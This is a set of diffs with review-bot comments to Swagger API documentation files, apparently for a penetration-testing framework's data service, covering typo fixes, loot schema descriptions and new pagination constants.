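       key :tags, [ 'host' ]
 
       parameter :update_id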

+ 2
- 2
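--- a/documentation/api/v1/login_api_doc.rb
+++ b/documentation/api/v1/login_api_doc.rb
@@ -153,7 +153,7 @@ module LoginApiDoc
   end
 
   swagger_path '/api/v1/logins/{id}' do
-    # Swagger documentation for api/v1/logins/:id GET
+    # Swagger documentation for /api/v1/logins/:id GET
     operation :get do
       key :description, 'Return specific login that is stored in the database.'
       key :tags, [ 'login' ]
@@ -193,7 +193,7 @@ module LoginApiDoc
 
     # Swagger documentation for /api/v1/logins/:id PUT
     operation :put do
-      key :description, 'Update the attributes an existing login.'
+      key :description, 'Update the attributes on an existing login.'
       key :tags, [ 'login' ]
 
       parameter :update_id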

+ 17
- 6
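--- a/documentation/api/v1/loot_api_doc.rb
+++ b/documentation/api/v1/loot_api_doc.rb
@@ -10,7 +10,8 @@ module LootApiDoc
   LTYPE_EXAMPLE = "'file', 'image', 'config_file', etc."
   PATH_DESC = 'The on-disk path to the loot file.'
   PATH_EXAMPLE = '/path/to/file.txt'
-  DATA_DESC = 'The contents of the file.'
+  DATA_DESC = "Base64 encoded copy of the file's contents."
+  DATA_EXAMPLE = 'dGhpcyBpcyB0aGUgZmlsZSdzIGNvbnRlbnRz'
   CONTENT_TYPE_DESC = 'The mime/content type of the file at {#path}.  Used to server the file correctly so browsers understand whether to render or download the file.'
   CONTENT_TYPE_EXAMPLE = 'text/plain'
   NAME_DESC = 'The name of the loot.'
@@ -18,6 +19,9 @@ module LootApiDoc
   INFO_DESC = 'Information about the loot.'
   MODULE_RUN_ID_DESC = 'The ID of the module run record this loot is associated with.'
 
+  # Some of the attributes expect different data when doing a create.
+  CREATE_PATH_DESC = 'The name to give the file on the server. All files are stored in a server configured path, so a full path is not needed. If there is a corresponding file on disk, the given value will be prepended with a unique string to prevent accidental overwrites of other files.'
+  CREATE_PATH_EXAMPLE = 'password_file.txt'
 
 # Swagger documentation for loot model
   swagger_schema :Loot do
@@ -28,7 +32,7 @@ module LootApiDoc
     property :service_id, type: :integer, format: :int32, description: SERVICE_ID_DESC
     property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE
     property :path, type: :string, description: PATH_DESC, example: PATH_EXAMPLE
-    property :data, type: :string, description: DATA_DESC
+    property :data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
     property :content_type, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
     property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE
     property :info, type: :string, description: INFO_DESC
@@ -87,8 +91,8 @@ module LootApiDoc
           property :host, type: :string, format: :ipv4, description: HOST_DESC, example: RootApiDoc::HOST_EXAMPLE
           property :service,  '$ref': :Service
           property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE, required: true
-          property :path, type: :string, description: PATH_DESC, example: PATH_EXAMPLE, required: true
-          property :data, type: :string, description: DATA_DESC
+          property :path, type: :string, description: CREATE_PATH_DESC, example: CREATE_PATH_EXAMPLE, required: true
+          property :data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
           property :ctype, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
           property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE, required: true
           property :info, type: :string, description: INFO_DESC
@@ -195,7 +199,7 @@ module LootApiDoc
 
     # Swagger documentation for /api/v1/loots/{id} PUT
     operation :put do
-      key :description, 'Update the attributes an existing loot.'
+      key :description, 'Update the attributes on an existing loot.'
       key :tags, [ 'loot' ]
 
       parameter :update_id
@@ -206,7 +210,14 @@ module LootApiDoc
         key :description, 'The updated attributes to overwrite to the loot.'
         key :required, true
         schema do
-          key :'$ref', :Loot
+          property :workspace, type: :string, required: true, description: RootApiDoc::WORKSPACE_POST_DESC, example: RootApiDoc::WORKSPACE_POST_EXAMPLE
+          property :host_id, type: :integer, format: :int32, description: HOST_ID_DESC
+          property :service_id, type: :integer, format: :int32, description: SERVICE_ID_DESC
+          property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE, required: true
+          property :path, type: :string, description: CREATE_PATH_DESC, example: CREATE_PATH_EXAMPLE, required: true
+          property :ctype, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
+          property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE, required: true
+          property :info, type: :string, description: INFO_DESC
         end
       end
 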
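Review bot: The new PUT body schema in the last hunk marks `workspace`, `ltype`, `path` and `name` as `required: true`, although the parameter description on the line above it, "The updated attributes to overwrite to the loot", reads as a partial update; if the controller really rejects a PUT that omits any of them the description should say so, otherwise those flags belong only on the POST schema in the fourth hunk. The `data` property, which that POST schema documents as base64 file contents, is absent from the PUT schema; a one-line comment such as `# loot contents cannot be replaced via PUT` (or the property itself, if the omission is accidental) would settle the question for readers. `path` on PUT also reuses CREATE_PATH_DESC, whose text describes create-time renaming behaviour that may not hold for an update, so a separate description or a note that it does apply would be clearer.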

+ 1
- 1
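--- a/documentation/api/v1/note_api_doc.rb
+++ b/documentation/api/v1/note_api_doc.rb
@@ -184,7 +184,7 @@ module NoteApiDoc
 
     # Swagger documentation for /api/v1/notes/:id PUT
     operation :put do
-      key :description, 'Update the attributes an existing note.'
+      key :description, 'Update the attributes on an existing note.'
       key :tags, [ 'note' ]
 
       parameter :update_id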

+ 9
- 0
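--- a/documentation/api/v1/root_api_doc.rb
+++ b/documentation/api/v1/root_api_doc.rb
@@ -17,6 +17,15 @@ module RootApiDoc
   AUTH_CODE_DESC = 'The authentication error code that was generated.'
   AUTH_CODE_EXAMPLE = 401
   AUTH_MESSAGE_DESC = 'A message describing the authentication error that occurred.'
+  LIMIT_DEFAULT = 100
+  LIMIT_DESC = "The maximum number of results that will be retrieved from the query. (Default: #{LIMIT_DEFAULT})"
+  OFFSET_DEFAULT = 0
+  OFFSET_DESC = "The number of results the query will begin reading from the beginning of the set. (Default: #{OFFSET_DEFAULT})"
+  ORDER_DESC = 'The order in which results are returned, based on the created_at datetime. (Default: desc)'
+  ORDER_ENUM = [
+      'asc',
+      'desc'
+  ]
 
   DEFAULT_RESPONSE_200 = 'Successful operation.'
   DEFAULT_RESPONSE_401 = 'Authenticate to access this resource.'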
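Review bot: `OFFSET_DESC` is hard to parse as written ("The number of results the query will begin reading from the beginning of the set"); `OFFSET_DESC = "The number of results to skip from the beginning of the result set. (Default: #{OFFSET_DEFAULT})"` says the same thing plainly. `ORDER_ENUM` is the only new constant left mutable; the surrounding constants are strings and integers, so `].freeze` on its closing line keeps the array from being modified at runtime, and its elements are indented by six spaces where the file's two-space step would put them at four.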

+ 1
- 1
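--- a/documentation/api/v1/service_api_doc.rb
+++ b/documentation/api/v1/service_api_doc.rb
@@ -187,7 +187,7 @@ module ServiceApiDoc
 
     # Swagger documentation for /api/v1/services/:id PUT
     operation :put do
-      key :description, 'Update the attributes an existing service.'
+      key :description, 'Update the attributes on an existing service.'
       key :tags, [ 'service' ]
 
       parameter :update_id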

+ 1
- 1
documentation/api/v1/session_api_doc.rb View File

@@ -86,7 +86,7 @@ module SessionApiDoc
86 86
   end
87 87
 
88 88
   swagger_path '/api/v1/sessions/{id}' do
89
-    # Swagger documentation for api/v1/sessions/:id GET
89
+    # Swagger documentation for /api/v1/sessions/:id GET
90 90
     operation :get do
91 91
       key :description, 'Return a specific session that is stored in the database.'
92